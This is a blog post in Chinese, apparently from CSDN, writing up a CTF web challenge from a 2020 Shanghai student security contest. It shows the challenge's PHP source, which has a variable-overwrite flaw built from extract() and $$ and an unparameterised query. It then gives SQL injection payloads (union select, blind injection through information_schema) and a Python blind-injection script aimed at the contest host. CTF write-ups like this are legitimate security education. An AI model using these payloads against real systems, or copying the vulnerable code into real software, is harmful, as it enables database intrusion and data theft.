2020全国大学生网安邀请赛暨第六届上海市大学生网安大赛-千毒网盘

最新推荐文章于 2024-05-14 17:30:13 发布

末初

最新推荐文章于 2024-05-14 17:30:13 发布

阅读量1.6k

点赞数 4

分类专栏： CTF_WEB_Writeup

本文链接：https://blog.csdn.net/mochu7777777/article/details/109695857

版权

CTF_WEB_Writeup 专栏收录该内容

172 篇文章 62 订阅

订阅专栏

在这里插入图片描述
根目录/www.zip有源码

index.php

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <title>千毒网盘</title>
</head>
<body>
<div class="container">
<div class="page-header">
				<h1>
					千毒网盘 <small>提取你的文件</small>
				</h1>
			</div>
	<div class="row clearfix">
	<div class="col-md-4 column">
		</div>
		<div class="col-md-4 column">
			<br>
			<form role="form" action='/index.php' method="POST">
				<div class="form-group">
					 <h3>提取码</h3><br><input class="form-control" name="code" />
				</div>
				<button type="submit" class="btn btn-block btn-default btn-warning">提取文件</button>
			</form> 
			<br>
			<?php
			include 'code.php';

			$pan = new Pan();

			foreach(array('_GET', '_POST', '_COOKIE') as $key)
			{   
				if($$key) {
					foreach($$key as $key_2 => $value_2) { 
						if(isset($$key_2) and $$key_2 == $value_2) 
							unset($$key_2); 
					}
				}
			}
			if(isset($_POST['code'])) $_POST['code'] = $pan->filter($_POST['code']);
			if($_GET) extract($_GET, EXTR_SKIP);
			if($_POST) extract($_POST, EXTR_SKIP);
			if(isset($_POST['code']))
			{
				$message = $pan->getfile();
				echo <<<EOF
				<div class="alert alert-dismissable alert-info">
				 <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
				<h4>
					注意!
				</h4> <strong>注意!</strong> {$message}
				</div>
EOF;
			}
			?>
		</div>
		<div class="col-md-4 column">
		</div>
	</div>
	</div>
</div>
</body>
</html>

code.php

<?php

class Pan
{
    public $hostname = '127.0.0.1';
    public $username = 'root';
    public $password = 'root';
    public $database = 'ctf';
    private $mysqli = null;

    public function __construct()
    {
        
        $this->mysqli = mysqli_connect(
            $this->hostname,
            $this->username,
            $this->password
        );
        mysqli_select_db($this->mysqli,$this->database);

        
    }

    public function filter($string) 
    {
        $safe = preg_match('/union|select|flag|in|or|on|where|like|\'/is', $string);
        if($safe === 0){
            return $string;
        }else{
            return False;
        }
		    
    }

    public function getfile()
    {
        
        $code = $_POST['code'];

        if($code === False) return '非法提取码！';
        $file_code = array(114514,233333,666666);
        
        if(in_array($code,$file_code))
        {
            $sql = "select * from file where code='$code'";
            $result = mysqli_query($this->mysqli,$sql);
            $result = mysqli_fetch_object($result);
            return '下载直链为：'.$result->url;
        }else{
            return '提取码不存在！';
        }
        
    }

}

参考：https://daolgts.github.io/2018/09/05/unset-%E8%AE%B0%E4%B8%80%E9%81%93CTF%E9%A2%98/

构造payload

GET
http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]=114514'/**/and/**/1=1#

POST
code=114514'/**/and/**/1=1#

and 1=1
在这里插入图片描述
and 1=2

联合查询可直接得到flag，需要注意的点是，这里无法通过构造前面为假后面为真的情况直接返回回显（因为前面一旦错误，直接被if判断为提取码不存在！），另外这里in_array()函数没有加第三个参数为true，存在弱类型缺陷，不过没啥影响
在这里插入图片描述
只能构造如上条件，union select两边都为真，返回两条数据，想要返回下面那条数据直接加个limit 1,1即可

在这里插入图片描述
payload

7777777'  union select 1,2 limit 1,1#

在这里插入图片描述
然后就是正常的注入过程了，这里就不一一演示了，直接查flag

在这里插入图片描述
然后比赛的时候我傻乎乎的用盲注做的。。。。。。贴一下盲注的解法

盲注脚本

import requests,string
from urllib.parse import quote

ascii_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
url = 'http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]='

post_header = {'Host': 'eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
               'Accept-Encoding': 'gzip, deflate',
               'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
               'Content-Type': 'application/x-www-form-urlencoded'}

for i in range(1,100):
    for j in ascii_str:
        payload = "114514'/**/and/**/ord(mid(database(),{0},1))={1}#".format(i,ord(j))
        post_content = {'code':payload}
        res_url = url+quote(payload)
        res = requests.post(url=res_url,headers=post_header,data=post_content)
        if 'png' in res.text:
            print(j,end="")

payload

114514'/**/and/**/ord(mid(database(),{0},1))={1}#

114514'/**/and/**/ord(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#

114514'/**/and/**/ord(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{0},1))={1}#

114514'/**/and/**/ord(mid((select/**/flag/**/from/**/ctf.flag),{0},1))={1}#

查询出来的结果

Databases: ctf
[ctf]Tables: file,flag
[flag]columns: flag

在这里插入图片描述

末初

关注

4
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
2020全国大学生网安邀请赛暨第六届上海市大学生网安大赛-千毒网盘

文章目录千毒网盘HelloTryToLogin千毒网盘根目录/www.zip有源码index.php<html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/bootstra
复制链接

扫一扫